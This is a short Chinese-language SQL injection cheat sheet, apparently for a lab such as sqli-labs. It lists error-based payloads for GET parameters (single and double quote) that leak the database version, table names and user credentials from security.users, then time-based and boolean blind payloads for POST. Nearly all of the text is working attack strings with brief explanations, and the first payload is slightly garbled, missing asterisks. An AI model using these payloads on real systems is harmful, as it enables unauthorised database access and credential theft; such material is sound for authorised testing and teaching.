一、报错注入
1.GET单引号报错注入
场景:页面显示固定,无法显示数据库信息,通过报错来显示数据库信息等等。
获取版本号,数据库名,用户
0' union select 1,2,3 from (select count(),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a+--+
获取表名,可修改limit 0,1的值,来获取所有数据库的名称
0'+union+select+1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+
获取用户信息
0'+union+select+1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
2.GET双引号报错注入
获取版本号,数据库名,用户
0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a+--+
获取表名
"+union+select+1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a--+
获取用户信息
0"+union+select+1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
二、POST基于时间与布尔盲注
场景:用于不知如何获取数据库信息,通过页面时间响应来一步步探测,同时探测是否是时间盲注题目
1.基于时间的盲注
判断数据库长度是否大于5
'and (select (if(length(database())>5,sleep(5),null)))--+
2.基于布尔的盲注
'and (length(database())=9)--+
